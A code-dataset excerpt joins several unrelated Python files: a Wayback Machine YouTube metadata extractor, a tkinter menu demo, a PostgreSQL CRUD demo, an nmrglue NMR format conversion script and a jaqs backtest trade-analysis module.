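        # The code below zips each capture row with the header row into a dict.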
query = {
'url': url,
'output': 'json',
'fl': 'original,mimetype,length,timestamp',
'limit': 500,
'filter': ['statuscode:200'] + (filters or []),
'collapse': collapse or [],
**(query or {})
}
res = self._download_json('https://web.archive.org/cdx/search/cdx', item_id, note, query=query)
if isinstance(res, list) and len(res) >= 2:
# format response to make it easier to use
return list(dict(zip(res[0], v)) for v in res[1:])
elif not isinstance(res, list) or len(res) != 0:
self.report_warning('Error while parsing CDX API response' + bug_reports_message())
def _extract_yt_initial_variable(self, webpage, regex, video_id, name):
return self._parse_json(self._search_regex(
(r'%s\s*%s' % (regex, self._YT_INITIAL_BOUNDARY_RE),
regex), webpage, name, default='{}'), video_id, fatal=False)
def _extract_webpage_title(self, webpage):
page_title = self._html_search_regex(
r'<title>([^<]*)</title>', webpage, 'title', default='')
# YouTube video pages appear to always have either 'YouTube -' as prefix or '- YouTube' as suffix.
return self._html_search_regex(
r'(?:YouTube\s*-\s*(.*)$)|(?:(.*)\s*-\s*YouTube$)',
page_title, 'title', default='')
def _extract_metadata(self, video_id, webpage):
search_meta = ((lambda x: self._html_search_meta(x, webpage, default=None)) if webpage else (lambda x: None))
player_response = self._extract_yt_initial_variable(
webpage, self._YT_INITIAL_PLAYER_RESPONSE_RE, video_id, 'initial player response') or {}
initial_data = self._extract_yt_initial_variable(
webpage, self._YT_INITIAL_DATA_RE, video_id, 'initial player response') or {}
initial_data_video = traverse_obj(
initial_data, ('contents', 'twoColumnWatchNextResults', 'results', 'results', 'contents', ..., 'videoPrimaryInfoRenderer'),
expected_type=dict, get_all=False, default={})
video_details = traverse_obj(
player_response, 'videoDetails', expected_type=dict, get_all=False, default={})
microformats = traverse_obj(
player_response, ('microformat', 'playerMicroformatRenderer'), expected_type=dict, get_all=False, default={})
video_title = (
video_details.get('title')
or YoutubeBaseInfoExtractor._get_text(microformats, 'title')
or YoutubeBaseInfoExtractor._get_text(initial_data_video, 'title')
or self._extract_webpage_title(webpage)
or search_meta(['og:title', 'twitter:title', 'title']))
channel_id = str_or_none(
video_details.get('channelId')
or microformats.get('externalChannelId')
or search_meta('channelId')
or self._search_regex(
r'data-channel-external-id=(["\'])(?P<id>(?:(?!\1).)+)\1', # @b45a9e6
webpage, 'channel id', default=None, group='id'))
channel_url = f'http://www.youtube.com/channel/{channel_id}' if channel_id else None
duration = int_or_none(
video_details.get('lengthSeconds')
or microformats.get('lengthSeconds')
or parse_duration(search_meta('duration')))
description = (
video_details.get('shortDescription')
or YoutubeBaseInfoExtractor._get_text(microformats, 'description')
or clean_html(get_element_by_id('eow-description', webpage)) # @9e6dd23
or search_meta(['description', 'og:description', 'twitter:description']))
uploader = video_details.get('author')
# Uploader ID and URL
uploader_mobj = re.search(
r'<link itemprop="url" href="(?P<uploader_url>https?://www\.youtube\.com/(?:user|channel)/(?P<uploader_id>[^"]+))">', # @fd05024
webpage)
if uploader_mobj is not None:
uploader_id, uploader_url = uploader_mobj.group('uploader_id'), uploader_mobj.group('uploader_url')
else:
# @a6211d2
uploader_url = url_or_none(microformats.get('ownerProfileUrl'))
uploader_id = self._search_regex(
r'(?:user|channel)/([^/]+)', uploader_url or '', 'uploader id', default=None)
upload_date = unified_strdate(
dict_get(microformats, ('uploadDate', 'publishDate'))
or search_meta(['uploadDate', 'datePublished'])
or self._search_regex(
[r'(?s)id="eow-date.*?>(.*?)</span>',
r'(?:id="watch-uploader-info".*?>.*?|["\']simpleText["\']\s*:\s*["\'])(?:Published|Uploaded|Streamed live|Started) on (.+?)[<"\']'], # @7998520
webpage, 'upload date', default=None))
return {
'title': video_title,
'description': description,
'upload_date': upload_date,
'uploader': uploader,
'channel_id': channel_id,
'channel_url': channel_url,
'duration': duration,
'uploader_url': uploader_url,
'uploader_id': uploader_id,
}
def _extract_thumbnails(self, video_id):
try_all = 'thumbnails' in self._configuration_arg('check_all')
thumbnail_base_urls = ['http://{server}/vi{webp}/{video_id}'.format(
webp='_webp' if ext == 'webp' else '', video_id=video_id, server=server)
for server in (self._YT_ALL_THUMB_SERVERS if try_all else self._YT_DEFAULT_THUMB_SERVERS) for ext in (('jpg', 'webp') if try_all else ('jpg',))]
thumbnails = []
for url in thumbnail_base_urls:
response = self._call_cdx_api(
video_id, url, filters=['mimetype:image/(?:webp|jpeg)'],
collapse=['urlkey'], query={'matchType': 'prefix'})
if not response:
continue
thumbnails.extend(
{
'url': (self._WAYBACK_BASE_URL % (int_or_none(thumbnail_dict.get('timestamp')) or self._OLDEST_CAPTURE_DATE)) + thumbnail_dict.get('original'),
'filesize': int_or_none(thumbnail_dict.get('length')),
'preference': int_or_none(thumbnail_dict.get('length'))
} for thumbnail_dict in response)
if not try_all:
break
self._remove_duplicate_formats(thumbnails)
return thumbnails
def _get_capture_dates(self, video_id, url_date):
capture_dates = []
# Note: CDX API will not find watch pages with extra params in the url.
response = self._call_cdx_api(
video_id, f'https://www.youtube.com/watch?v={video_id}',
filters=['mimetype:text/html'], collapse=['timestamp:6', 'digest'], query={'matchType': 'prefix'}) or []
all_captures = sorted([int_or_none(r['timestamp']) for r in response if int_or_none(r['timestamp']) is not None])
# Prefer the new polymer UI captures as we support extracting more metadata from them
# WBM captures seem to all switch to this layout ~July 2020
modern_captures = list(filter(lambda x: x >= 20200701000000, all_captures))
if modern_captures:
capture_dates.append(modern_captures[0])
capture_dates.append(url_date)
if all_captures:
capture_dates.append(all_captures[0])
if 'captures' in self._configuration_arg('check_all'):
capture_dates.extend(modern_captures + all_captures)
# Fallbacks if any of the above fail
capture_dates.extend([self._OLDEST_CAPTURE_DATE, self._NEWEST_CAPTURE_DATE])
return orderedSet(capture_dates)
def _real_extract(self, url):
url_date, video_id = self._match_valid_url(url).groups()
urlh = None
try:
urlh = self._request_webpage(
HEADRequest('https://web.archive.org/web/2oe_/http://wayback-fakeurl.archive.org/yt/%s' % video_id),
video_id, note='Fetching archived video file url', expected_status=True)
except ExtractorError as e:
# HTTP Error 404 is expected if the video is not saved.
if isinstance(e.cause, compat_HTTPError) and e.cause.code == 404:
self.raise_no_formats(
'The requested video is not archived, indexed, or there is an issue with web.archive.org',
expected=True)
else:
raise
capture_dates = self._get_capture_dates(video_id, int_or_none(url_date))
self.write_debug('Captures to try: ' + ', '.join(str(i) for i in capture_dates if i is not None))
info = {'id': video_id}
for capture in capture_dates:
if not capture:
continue
webpage = self._download_webpage(
(self._WAYBACK_BASE_URL + 'http://www.youtube.com/watch?v=%s') % (capture, video_id),
video_id=video_id, fatal=False, errnote='unable to download capture webpage (it may not be archived)',
note='Downloading capture webpage')
current_info = self._extract_metadata(video_id, webpage or '')
# Try avoid getting deleted video metadata
if current_info.get('title'):
info = merge_dicts(info, current_info)
if 'captures' not in self._configuration_arg('check_all'):
break
info['thumbnails'] = self._extract_thumbnails(video_id)
if urlh:
url = compat_urllib_parse_unquote(urlh.url)
video_file_url_qs = parse_qs(url)
# Attempt to recover any ext & format info from playback url & response headers
format = {'url': url, 'filesize': int_or_none(urlh.headers.get('x-archive-orig-content-length'))}
itag = try_get(video_file_url_qs, lambda x: x['itag'][0])
if itag and itag in YoutubeIE._formats:
format.update(YoutubeIE._formats[itag])
format.update({'format_id': itag})
else:
mime = try_get(video_file_url_qs, lambda x: x['mime'][0])
ext = (mimetype2ext(mime)
or urlhandle_detect_ext(urlh)
or mimetype2ext(urlh.headers.get('x-archive-guessed-content-type')))
format.update({'ext': ext})
info['formats'] = [format]
if not info.get('duration'):
info['duration'] = str_to_int(try_get(video_file_url_qs, lambda x: x['dur'][0]))
if not info.get('title'):
info['title'] = video_id
return info
| 2.046875 | 2 |
Interfas Grafica XI (GUI)/InterfasGraficaXI.py | BrianMarquez3/Python-Course | 20 | 11347 | <filename>Interfas Grafica XI (GUI)/InterfasGraficaXI.py
# Graphical Interface XI
# Menu
from tkinter import *
root=Tk()
barraMenu=Menu(root)
root.config(menu=barraMenu, width=600, height=400)
archivoMenu=Menu(barraMenu, tearoff=0)
archivoMenu.add_command(label="Nuevo")
archivoMenu.add_command(label="Guardar")
archivoMenu.add_command(label="Guardar Como")
archivoMenu.add_separator()
archivoMenu.add_command(label="Cerrar")
archivoMenu.add_command(label="Salir")
archivoEdicion=Menu(barraMenu, tearoff=0)
archivoHerramientas=Menu(barraMenu)
archivoEdicion.add_command(label="Copiar")
archivoEdicion.add_command(label="Cortar")
archivoEdicion.add_command(label="Pegar")
archivoAyuda=Menu(barraMenu, tearoff=0)
barraMenu.add_cascade(label="Archivo", menu=archivoMenu)
barraMenu.add_cascade(label="Edicion", menu=archivoEdicion)
barraMenu.add_cascade(label="Herramienta", menu=archivoHerramientas)
barraMenu.add_cascade(label="Ayuda", menu=archivoAyuda)
archivoAyuda.add_command(label="Licencia")
archivoAyuda.add_command(label="Acerca de...")
root.mainloop() | 2.5625 | 3 |
virtual/lib/python3.6/site-packages/macaroonbakery/tests/__init__.py | marknesh/pitches | 0 | 11348 | # Copyright 2017 Canonical Ltd.
# Licensed under the LGPLv3, see LICENCE file for details.
| 0.703125 | 1 |
08/postgresql_demo.py | catcherwong-archive/2019 | 27 | 11349 | <reponame>catcherwong-archive/2019<gh_stars>10-100
# -*- coding: UTF-8 -*-
import psycopg2 #postgresql
import time
import datetime
class PgDemo:
def __init__(self, host, port, db, user, pwd):
self.host = host
self.port = port
self.db = db
self.user = user
        self.pwd = pwd
def getConnection(self):
conn = None
try:
conn = psycopg2.connect(
host=self.host,
port=self.port,
database=self.db,
user=self.user,
password=self.pwd,
)
except Exception as err:
print("can not connect to the database,%s" % err)
return conn
def query_all(self):
with self.getConnection() as conn:
sql = "select id, name, gender, create_time from t1"
try:
cur = conn.cursor()
cur.execute(sql)
res = cur.fetchall()
# print(res)
print("id\tname\tgender\ttime")
for d in res:
print("%d\t%s\t%s\t%s" % (d[0], d[1], "male" if d[2] == 1 else "female", self.timestamp2datetime(d[3], False)))
except Exception as err:
print("query all fail, %s" % err)
finally:
cur.close()
def query_lastone(self):
with self.getConnection() as conn:
sql = "select id, name, gender, create_time from t1 order by create_time desc limit 1"
try:
cur = conn.cursor()
cur.execute(sql)
res = cur.fetchone()
# print(res)
print("id\tname\tgender\ttime")
print("%d\t%s\t%s\t%s" % (res[0], res[1], "male" if res[2] == 1 else "female", self.timestamp2datetime(res[3], False)))
except Exception as err:
print("query lastone fail, %s" % err)
finally:
cur.close()
def query_byname(self, name):
with self.getConnection() as conn:
sql = "select id, name, gender, create_time from t1 where name = %s"
try:
cur = conn.cursor()
cur.execute(sql, (name, ))
res = cur.fetchone()
# print(res)
print("id\tname\tgender\ttime")
print("%d\t%s\t%s\t%s" % (res[0], res[1], "male" if res[2] == 1 else "female", self.timestamp2datetime(res[3], False)))
except Exception as err:
print("query by name fail, %s" % err)
finally:
cur.close()
def insert_one(self, name, gender):
with self.getConnection() as conn:
sql = " insert into t1(name, gender, create_time) values(%s, %s, %s) "
try:
cur = conn.cursor()
cur.execute(sql, (name, gender, self.getCurrentTimestamp()))
print("insert ok")
except Exception as err:
print("insert one fail, %s" % err)
finally:
cur.close()
def update_genderbyid(self, id, gender):
with self.getConnection() as conn:
sql = " update t1 set gender = %s where id = %s "
try:
cur = conn.cursor()
cur.execute(sql, (gender, id))
print("update ok")
except Exception as err:
print("update gender by id fail, %s" % err)
finally:
cur.close()
def delete_byname(self, name):
with self.getConnection() as conn:
sql = " delete from t1 where name = %s "
try:
cur = conn.cursor()
cur.execute(sql, (name, ))
print("delete ok")
except Exception as err:
print("delete by name fail, %s" % err)
finally:
cur.close()
def getCurrentTimestamp(self):
ts = int ( round ( time.time() * 1000 ) )
print(ts)
return ts
def timestamp2datetime(self, timestamp, issecond):
if(issecond == True):
t = datetime.datetime.fromtimestamp(timestamp)
return t.strftime("%Y-%m-%d %H:%M:%S")
else:
t = datetime.datetime.fromtimestamp(timestamp / 1000)
return t.strftime("%Y-%m-%d %H:%M:%S.%f")[:-3]
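# Illustrative example (not part of the original demo): create_time stores millisecond
# timestamps, so timestamp2datetime(1546300800000, False) returns '2019-01-01 00:00:00.000'
# on a machine whose local timezone is UTC (fromtimestamp uses the local timezone).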
if __name__ == "__main__":
pg = PgDemo("127.0.0.1", 5432, "demo", "postgres", "123456")
print("===========insert_one==============")
pg.insert_one("wong", 1)
print("===========query_all==============")
pg.query_all()
print("===========query_lastone==============")
pg.query_lastone()
print("===========query_byname==============")
pg.query_byname("catcher")
print("===========update_genderbyid==============")
pg.update_genderbyid(4, 2)
print("===========delete_byname==============")
pg.delete_byname("wong")
print("===========query_all==============")
pg.query_all()
| 2.9375 | 3 |
examples/convert/pipe2sparky_2d.py | thegooglecodearchive/nmrglue | 1 | 11350 | #! /usr/bin/env python
import nmrglue as ng
# read in the NMRPipe data
dic,data = ng.pipe.read("../common_data/2d_pipe/test.ft2")
# Set the parameters
u = ng.pipe.guess_udic(dic,data)
# create the converter object and initialize it with the NMRPipe data
C = ng.convert.converter()
C.from_pipe(dic,data,u)
# create Sparky data and then write it out
ng.sparky.write("2d_sparky.ucsf",*C.to_sparky(),overwrite=True)
# check the conversion against NMRPipe
print "Conversion complete, listing differences between files:"
sdic,sdata = ng.sparky.read("2d_sparky.ucsf")
sdic2,sdata2 = ng.sparky.read("../common_data/2d_sparky/data.ucsf")
print ng.misc.pair_similar(sdic,sdata,sdic2,sdata2,verb=True)
| 2.4375 | 2 |
jaqs/trade/analyze/analyze.py | WayneWan413/JAQS | 0 | 11351 | # encoding: utf-8
from __future__ import print_function
import os
import json
from collections import OrderedDict
import numpy as np
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib.ticker import Formatter
from jaqs.trade.analyze.report import Report
from jaqs.data import RemoteDataService
from jaqs.data.basic.instrument import InstManager
from jaqs.trade import common
import jaqs.util as jutil
STATIC_FOLDER = jutil.join_relative_path("trade/analyze/static")
TO_PCT = 100.0
MPL_RCPARAMS = {'figure.facecolor': '#F6F6F6',
'axes.facecolor': '#F6F6F6',
'axes.edgecolor': '#D3D3D3',
'text.color': '#555555',
'grid.color': '#B1B1B1',
'grid.alpha': 0.3,
# scale
'axes.linewidth': 2.0,
'axes.titlepad': 12,
'grid.linewidth': 1.0,
'grid.linestyle': '-',
# font size
'font.size': 13,
'axes.titlesize': 18,
'axes.labelsize': 14,
'legend.fontsize': 'small',
'lines.linewidth': 2.5,
}
class TradeRecordEmptyError(Exception):
def __init__(self, *args):
super(TradeRecordEmptyError, self).__init__(*args)
class MyFormatter(Formatter):
def __init__(self, dates, fmt='%Y%m'):
self.dates = dates
self.fmt = fmt
def __call__(self, x, pos=0):
"""Return the label for time x at position pos"""
ind = int(np.round(x))
if ind >= len(self.dates) or ind < 0:
return ''
# return self.dates[ind].strftime(self.fmt)
return pd.to_datetime(self.dates[ind], format="%Y%m%d").strftime(self.fmt)
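# Usage sketch (mirrors how MyFormatter is applied later in this module): plot against
# integer positions and let the formatter translate them back to trade dates, e.g.
#   ax.plot(np.arange(len(idx0)), values)
#   ax.xaxis.set_major_formatter(MyFormatter(idx0, '%Y-%m-%d'))
# so that non-trading days leave no gaps on the x-axis.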
class BaseAnalyzer(object):
"""
Attributes
----------
_trades : pd.DataFrame
_configs : dict
data_api : BaseDataServer
_universe : set
All securities that have been traded.
"""
def __init__(self):
self.file_folder = ""
self._trades = None
self._configs = None
self.data_api = None
self.dataview = None
self._universe = []
self._closes = None
self._closes_adj = None
self.daily_position = None
self.adjust_mode = None
self.inst_map = dict()
self.performance_metrics = dict()
self.risk_metrics = dict()
self.report_dic = dict()
@property
def trades(self):
"""Read-only attribute"""
return self._trades
@property
def universe(self):
"""Read-only attribute"""
return self._universe
@property
def configs(self):
"""Read-only attribute"""
return self._configs
@property
def closes(self):
"""Read-only attribute, close prices of securities in the universe"""
return self._closes
@property
def closes_adj(self):
"""Read-only attribute, adjusted close prices of securities in the universe"""
return self._closes_adj
def initialize(self, data_api=None, dataview=None, file_folder='.'):
"""
Read trades from csv file to DataFrame of given data type.
Parameters
----------
data_api : RemoteDataService
dataview : DataView
file_folder : str
Directory path where trades and configs are stored.
"""
self.data_api = data_api
self.dataview = dataview
type_map = {'task_id': str,
'entrust_no': str,
'entrust_action': str,
'symbol': str,
'fill_price': float,
'fill_size': float,
'fill_date': np.integer,
'fill_time': np.integer,
'fill_no': str,
'commission': float}
abs_path = os.path.abspath(file_folder)
self.file_folder = abs_path
trades = pd.read_csv(os.path.join(self.file_folder, 'trades.csv'), ',', dtype=type_map)
if trades.empty:
raise TradeRecordEmptyError("No trade records found in your 'trades.csv' file. Analysis stopped.")
self._init_universe(trades.loc[:, 'symbol'].values)
self._init_configs(self.file_folder)
self._init_trades(trades)
self._init_symbol_price()
self._init_inst_data()
def _init_inst_data(self):
symbol_str = ','.join(self.universe)
if self.dataview is not None:
data_inst = self.dataview.data_inst
self.inst_map = data_inst.to_dict(orient='index')
elif self.data_api is not None:
inst_mgr = InstManager(data_api=self.data_api, symbol=symbol_str)
self.inst_map = {k: v.__dict__ for k, v in inst_mgr.inst_map.items()}
del inst_mgr
else:
raise ValueError("no dataview or dataapi provided.")
def _init_trades(self, df):
"""Add datetime column. """
df.loc[:, 'fill_dt'] = jutil.combine_date_time(df.loc[:, 'fill_date'], df.loc[:, 'fill_time'])
df = df.set_index(['symbol', 'fill_dt']).sort_index(axis=0)
# self._trades = jutil.group_df_to_dict(df, by='symbol')
self._trades = df
def _init_symbol_price(self):
"""Get close price of securities in the universe from data server."""
if self.dataview is not None:
df_close = self.dataview.get_ts('close', start_date=self.start_date, end_date=self.end_date)
df_close_adj = self.dataview.get_ts('close_adj', start_date=self.start_date, end_date=self.end_date)
else:
df, msg = self.data_api.daily(symbol=','.join(self.universe), fields='trade_date,symbol,close',
start_date=self.start_date, end_date=self.end_date)
if msg != '0,':
print(msg)
df_close = df.pivot(index='trade_date', columns='symbol', values='close')
df_adj, msg = self.data_api.daily(symbol=','.join(self.universe), fields='trade_date,symbol,close',
start_date=self.start_date, end_date=self.end_date)
if msg != '0,':
print(msg)
df_close_adj = df_adj.pivot(index='trade_date', columns='symbol', values='close')
self._closes = df_close
self._closes_adj = df_close_adj
def _init_universe(self, securities):
"""Store the set of all traded securities."""
self._universe = set(securities)
def _init_configs(self, folder):
import codecs
with codecs.open(os.path.join(folder, 'configs.json'), 'r', encoding='utf-8') as f:
configs = json.load(f)
self._configs = configs
self.init_balance = self.configs['init_balance']
self.start_date = self.configs['start_date']
self.end_date = self.configs['end_date']
@staticmethod
def _process_trades(df):
"""Add various statistics to trades DataFrame."""
from jaqs.trade import common
# df = df.set_index('fill_date')
# pre-process
cols_to_drop = ['task_id', 'entrust_no', 'fill_no']
df = df.drop(cols_to_drop, axis=1)
def _apply(gp_df):
# calculation of non-cumulative fields
direction = gp_df['entrust_action'].apply(lambda s: 1 if common.ORDER_ACTION.is_positive(s) else -1)
fill_size, fill_price = gp_df['fill_size'], gp_df['fill_price']
turnover = fill_size * fill_price
gp_df.loc[:, 'BuyVolume'] = (direction + 1) / 2 * fill_size
gp_df.loc[:, 'SellVolume'] = (direction - 1) / -2 * fill_size
# Calculation of cumulative fields
gp_df.loc[:, 'CumVolume'] = fill_size.cumsum()
gp_df.loc[:, 'CumTurnOver'] = turnover.cumsum()
gp_df.loc[:, 'CumNetTurnOver'] = (turnover * -direction).cumsum()
gp_df.loc[:, 'position'] = (fill_size * direction).cumsum()
gp_df.loc[:, 'AvgPosPrice'] = calc_avg_pos_price(gp_df.loc[:, 'position'].values, fill_price.values)
gp_df.loc[:, 'CumProfit'] = (gp_df.loc[:, 'CumNetTurnOver'] + gp_df.loc[:, 'position'] * fill_price)
return gp_df
gp = df.groupby(by='symbol')
res = gp.apply(_apply)
return res
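# Columns produced per symbol by _process_trades: BuyVolume / SellVolume (per-fill sizes
# split by trade direction), CumVolume / CumTurnOver / CumNetTurnOver (cumulative totals),
# position (signed net position), AvgPosPrice (average cost price) and CumProfit
# (mark-to-market profit of the accumulated position).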
def process_trades(self):
# self._trades = {k: self._process_trades(v) for k, v in self.trades.items()}
self._trades = self._process_trades(self._trades)
def get_pos_change_info(self):
trades = pd.concat(self.trades.values(), axis=0)
gp = trades.groupby(by=['fill_date'], as_index=False)
res = OrderedDict()
account = OrderedDict()
for date, df in gp:
df_mod = df.loc[:, ['symbol', 'entrust_action', 'fill_size', 'fill_price',
'position', 'AvgPosPrice']]
df_mod.columns = ['symbol', 'action', 'size', 'price',
'position', 'cost price']
res[str(date)] = df_mod
mv = sum(df_mod.loc[:, 'price'] * df.loc[:, 'position'])
current_profit = sum(df.loc[:, 'CumProfit'])
cash = self.configs['init_balance'] + current_profit - mv
account[str(date)] = {'market_value': mv, 'cash': cash}
self.position_change = res
self.account = account
def get_daily(self):
close = self.closes
trade = self.trades
# pro-process
trade_cols = ['fill_date', 'BuyVolume', 'SellVolume', 'commission', 'position', 'AvgPosPrice', 'CumNetTurnOver']
trade = trade.loc[:, trade_cols]
gp = trade.groupby(by=['symbol', 'fill_date'])
func_last = lambda ser: ser.iat[-1]
trade = gp.agg({'BuyVolume': np.sum, 'SellVolume': np.sum, 'commission': np.sum,
'position': func_last, 'AvgPosPrice': func_last, 'CumNetTurnOver': func_last})
trade.index.names = ['symbol', 'trade_date']
# get daily position
df_position = trade['position'].unstack('symbol').fillna(method='ffill').fillna(0.0)
daily_position = df_position.reindex(close.index)
daily_position = daily_position.fillna(method='ffill').fillna(0)
self.daily_position = daily_position
# calculate statistics
close = pd.DataFrame(close.T.stack())
close.columns = ['close']
close.index.names = ['symbol', 'trade_date']
merge = pd.concat([close, trade], axis=1, join='outer')
def _apply(gp_df):
cols_nan_to_zero = ['BuyVolume', 'SellVolume', 'commission']
cols_nan_fill = ['close', 'position', 'AvgPosPrice', 'CumNetTurnOver']
# merge: pd.DataFrame
gp_df.loc[:, cols_nan_fill] = gp_df.loc[:, cols_nan_fill].fillna(method='ffill')
gp_df.loc[:, cols_nan_fill] = gp_df.loc[:, cols_nan_fill].fillna(0)
gp_df.loc[:, cols_nan_to_zero] = gp_df.loc[:, cols_nan_to_zero].fillna(0)
mask = gp_df.loc[:, 'AvgPosPrice'] < 1e-5
gp_df.loc[mask, 'AvgPosPrice'] = gp_df.loc[mask, 'close']
gp_df.loc[:, 'CumProfit'] = gp_df.loc[:, 'CumNetTurnOver'] + gp_df.loc[:, 'position'] * gp_df.loc[:, 'close']
gp_df.loc[:, 'CumProfitComm'] = gp_df['CumProfit'] - gp_df['commission'].cumsum()
daily_net_turnover = gp_df['CumNetTurnOver'].diff(1).fillna(gp_df['CumNetTurnOver'].iat[0])
daily_position_change = gp_df['position'].diff(1).fillna(gp_df['position'].iat[0])
gp_df['trading_pnl'] = (daily_net_turnover + gp_df['close'] * daily_position_change)
gp_df['holding_pnl'] = (gp_df['close'].diff(1) * gp_df['position'].shift(1)).fillna(0.0)
gp_df.loc[:, 'total_pnl'] = gp_df['trading_pnl'] + gp_df['holding_pnl']
return gp_df
gp = merge.groupby(by='symbol')
res = gp.apply(_apply)
self.daily = res
'''
def get_daily(self):
"""Add various statistics to daily DataFrame."""
self.daily = self._get_daily(self.closes, self.trades)
daily_dic = dict()
for sec, df_trade in self.trades.items():
df_close = self.closes[sec].rename('close')
res = self._get_daily(df_close, df_trade)
daily_dic[sec] = res
self.daily = daily_dic
'''
def get_returns(self, compound_return=True, consider_commission=True):
cols = ['trading_pnl', 'holding_pnl', 'total_pnl', 'commission', 'CumProfitComm', 'CumProfit']
'''
dic_symbol = {sec: self.inst_map[sec]['multiplier'] * df_daily.loc[:, cols]
for sec, df_daily in self.daily.items()}
df_profit = pd.concat(dic_symbol, axis=1) # this is cumulative profit
df_profit = df_profit.fillna(method='ffill').fillna(0.0)
df_pnl = df_profit.stack(level=1)
df_pnl = df_pnl.sum(axis=1)
df_pnl = df_pnl.unstack(level=1)
'''
daily = self.daily.loc[:, cols]
daily = daily.stack().unstack('symbol')
df_pnl = daily.sum(axis=1)
df_pnl = df_pnl.unstack(level=1)
self.df_pnl = df_pnl
# TODO: temporary solution
if consider_commission:
strategy_value = (df_pnl['total_pnl'] - df_pnl['commission']).cumsum() + self.init_balance
else:
strategy_value = df_pnl['total_pnl'].cumsum() + self.init_balance
market_values = pd.concat([strategy_value, self.data_benchmark], axis=1).fillna(method='ffill')
market_values.columns = ['strat', 'bench']
df_returns = market_values.pct_change(periods=1).fillna(0.0)
df_returns = df_returns.join((df_returns.loc[:, ['strat', 'bench']] + 1.0).cumprod(), rsuffix='_cum')
if compound_return:
df_returns.loc[:, 'active_cum'] = df_returns['strat_cum'] - df_returns['bench_cum'] + 1
df_returns.loc[:, 'active'] = df_returns['active_cum'].pct_change(1).fillna(0.0)
else:
df_returns.loc[:, 'active'] = df_returns['strat'] - df_returns['bench']
df_returns.loc[:, 'active_cum'] = df_returns['active'].add(1.0).cumprod(axis=0)
start = pd.to_datetime(self.configs['start_date'], format="%Y%m%d")
end = pd.to_datetime(self.configs['end_date'], format="%Y%m%d")
years = (end - start).days / 365.0
self.performance_metrics['Annual Return (%)'] =\
100 * (np.power(df_returns.loc[:, 'active_cum'].values[-1], 1. / years) - 1)
self.performance_metrics['Annual Volatility (%)'] =\
100 * (df_returns.loc[:, 'active'].std() * np.sqrt(common.CALENDAR_CONST.TRADE_DAYS_PER_YEAR))
self.performance_metrics['Sharpe Ratio'] = (self.performance_metrics['Annual Return (%)']
/ self.performance_metrics['Annual Volatility (%)'])
self.risk_metrics['Beta'] = np.corrcoef(df_returns.loc[:, 'bench'], df_returns.loc[:, 'strat'])[0, 1]
# bt_strat_mv = pd.read_csv('bt_strat_mv.csv').set_index('trade_date')
# df_returns = df_returns.join(bt_strat_mv, how='right')
self.returns = df_returns
def plot_pnl(self, save_folder=None):
old_mpl_rcparams = {k: v for k, v in mpl.rcParams.items()}
mpl.rcParams.update(MPL_RCPARAMS)
if save_folder is None:
save_folder = self.file_folder
fig1 = plot_portfolio_bench_pnl(self.returns.loc[:, 'strat_cum'],
self.returns.loc[:, 'bench_cum'],
self.returns.loc[:, 'active_cum'])
fig1.savefig(os.path.join(save_folder,'pnl_img.png'), facecolor=fig1.get_facecolor(), dpi=fig1.get_dpi())
fig2 = plot_daily_trading_holding_pnl(self.df_pnl['trading_pnl'],
self.df_pnl['holding_pnl'],
self.df_pnl['total_pnl'],
self.df_pnl['total_pnl'].cumsum())
fig2.savefig(os.path.join(save_folder,'pnl_img_trading_holding.png'), facecolor=fig2.get_facecolor(), dpi=fig2.get_dpi())
mpl.rcParams.update(old_mpl_rcparams)
def plot_pnl_OLD(self, save_folder=None):
if save_folder is None:
save_folder = self.file_folder
fig, (ax0, ax1, ax2) = plt.subplots(3, 1, figsize=(21, 8), dpi=300, sharex=True)
idx0 = self.returns.index
idx = np.arange(len(idx0))
bar_width = 0.3
ax0.bar(idx-bar_width/2, self.df_pnl['trading_pnl'], width=bar_width, color='indianred', label='Trading PnL',)
ax0.bar(idx+bar_width/2, self.df_pnl['holding_pnl'], width=bar_width, color='royalblue', label='Holding PnL')
ax0.axhline(0.0, color='k', lw=1, ls='--')
# ax0.plot(idx, self.pnl['total_pnl'], lw=1.5, color='violet', label='Total PnL')
ax0.legend(loc='upper left')
ax1.plot(idx, self.returns.loc[:, 'bench_cum'], label='Benchmark')
ax1.plot(idx, self.returns.loc[:, 'strat_cum'], label='Strategy')
ax1.legend(loc='upper left')
ax2.plot(idx, self.returns.loc[:, 'active_cum'], label='Extra Return')
ax2.legend(loc='upper left')
ax2.set_xlabel("Date")
ax2.set_ylabel("Net Value")
ax1.set_ylabel("Net Value")
ax2.xaxis.set_major_formatter(MyFormatter(idx0, '%Y-%m-%d'))
plt.tight_layout()
fig.savefig(os.path.join(save_folder, 'pnl_img.png'))
plt.close()
def gen_report(self, source_dir, template_fn, out_folder='.', selected=None):
"""
Generate HTML (and PDF) report of the trade analysis.
Parameters
----------
source_dir : str
path of directory where HTML template and css files are stored.
template_fn : str
File name of HTML template.
out_folder : str
Output folder of report.
selected : list of str or None
List of symbols whose detailed PnL curve and position will be plotted.
# TODO: this parameter should not belong to function
"""
dic = dict()
dic['html_title'] = "Alpha Strategy Backtest Result"
dic['selected_securities'] = selected
# we do not want to show username / password in report
dic['props'] = {k: v for k, v in self.configs.items() if ('username' not in k and 'password' not in k)}
dic['performance_metrics'] = self.performance_metrics
dic['risk_metrics'] = self.risk_metrics
dic['position_change'] = self.position_change
dic['account'] = self.account
dic['df_daily'] = jutil.group_df_to_dict(self.daily, by='symbol')
dic['daily_position'] = self.daily_position
self.report_dic.update(dic)
self.returns.to_csv(os.path.join(out_folder, 'returns.csv'))
r = Report(self.report_dic, source_dir=source_dir, template_fn=template_fn, out_folder=out_folder)
r.generate_html()
r.output_html('report.html')
def do_analyze(self, result_dir, selected_sec=None):
if selected_sec is None:
selected_sec = []
print("process trades...")
self.process_trades()
print("get daily stats...")
self.get_daily()
print("calc strategy return...")
self.get_returns(consider_commission=False)
if len(selected_sec) > 0:
print("Plot single securities PnL")
for symbol in selected_sec:
df_daily = self.daily.loc[pd.IndexSlice[symbol, :], :]
df_daily.index = df_daily.index.droplevel(0)
if df_daily is not None:
plot_trades(df_daily, symbol=symbol, save_folder=self.file_folder)
print("Plot strategy PnL...")
self.plot_pnl(result_dir)
print("generate report...")
self.gen_report(source_dir=STATIC_FOLDER, template_fn='report_template.html',
out_folder=result_dir,
selected=selected_sec)
class EventAnalyzer(BaseAnalyzer):
def __init__(self):
super(EventAnalyzer, self).__init__()
self.metrics = dict()
self.daily = None
self.data_benchmark = None
self.returns = None # OrderedDict
self.position_change = None # OrderedDict
self.account = None # OrderedDict
def initialize(self, data_server_=None, dataview=None, file_folder='.'):
super(EventAnalyzer, self).initialize(data_api=data_server_, dataview=dataview,
file_folder=file_folder)
